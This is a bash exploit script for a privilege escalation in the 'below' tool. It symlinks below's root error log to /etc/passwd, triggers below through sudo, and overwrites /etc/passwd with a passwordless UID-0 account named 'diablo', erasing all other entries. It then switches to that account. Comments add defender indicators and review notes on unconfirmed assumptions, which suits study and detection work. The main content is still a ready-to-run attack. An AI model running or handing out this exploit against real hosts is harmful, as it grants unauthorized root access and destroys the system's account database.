#!/bin/bash
# Exploit for Below privilege escalation
# Creates a root user 'diablo' via /var/log/below/error_root.log
#
# Flow, as visible in this script:
#   1. stage a passwd line with UID 0 / GID 0 and an empty password field
#   2. replace /var/log/below/error_root.log with a symlink to /etc/passwd
#   3. run `below` through sudo so that it handles that log path as root
#   4. copy the staged line over the log path, i.e. through the symlink
#   5. `su` to the new account
#
# Preconditions the script relies on: the invoking user can delete and create
# entries in /var/log/below without sudo (steps 2 and 4 run unprivileged) and
# is allowed to run /usr/bin/below via sudo.
#
# Defender notes:
#   - /var/log/below should not be writable by unprivileged users; a symlink
#     inside that directory is an indicator worth alerting on.
#   - Watch /etc/passwd for mode/ownership changes, for UID-0 entries other
#     than root, and for entries with an empty password field.
#   - Review sudoers rules that let unprivileged users run `below`, and run a
#     release of `below` that contains the fix for this log-handling issue.
#   - None of the steps below checks an exit status: the "[+]" messages are
#     printed unconditionally and are not evidence that a step succeeded.

# Staging file for the forged passwd line (fixed path in /tmp; removed again
# near the end of the script, so it is only a transient artifact).
TMP_FILE="/tmp/fake_diablo_passwd"
echo "[*] Creating fake root user entry for 'diablo'..."
# passwd fields: name 'diablo', empty password field, UID 0, GID 0,
# home /root, shell /bin/bash.
echo 'diablo::0:0:diablo:/root:/bin/bash' > "$TMP_FILE"
echo "[+] Temporary passwd file created at $TMP_FILE"
echo "[*] Removing original Below log file if it exists..."
# Runs without sudo: only works if the current user has write access to
# the /var/log/below directory itself.
rm -f /var/log/below/error_root.log
echo "[+] Removed old error_root.log"
echo "[*] Creating symlink from /var/log/below/error_root.log -> /etc/passwd..."
# From here on, anything that opens the log path without refusing symlinks
# operates on /etc/passwd instead.
ln -s /etc/passwd /var/log/below/error_root.log
echo "[+] Symlink created"
echo "[*] Running Below to log error..."
# The only privileged step. Output is discarded and the exit status ignored.
# NOTE(review): the 'veryfake' argument is presumably an invalid value meant
# to make below write to its root error log - confirm.
# NOTE(review): the unprivileged cp further down only works if /etc/passwd is
# writable by the current user afterwards; presumably that is a side effect of
# how below creates or re-permissions its log file - not shown here, confirm
# against the vendor advisory.
sudo /usr/bin/below snapshot --begin veryfake &> /dev/null
echo "[+] Below triggered (error logged as 'running below to log error')"
echo "[*] Overwriting Below log with fake passwd entry..."
# cp follows the symlink and truncates the existing target, so the whole of
# /etc/passwd is replaced by the single staged line; every other account
# entry is lost. A one-line /etc/passwd is therefore a strong indicator on an
# affected host, and the file has to be restored from backup afterwards.
cp "$TMP_FILE" /var/log/below/error_root.log
echo "[+] Fake passwd entry applied"
echo "[*] Cleaning up temporary file..."
rm -f "$TMP_FILE"
echo "[+] Temporary file removed"
echo "[*] Switching to new root user 'diablo'..."
# The entry has UID 0 and an empty password field; whether su accepts the
# empty password depends on the host's PAM/login configuration.
su diablo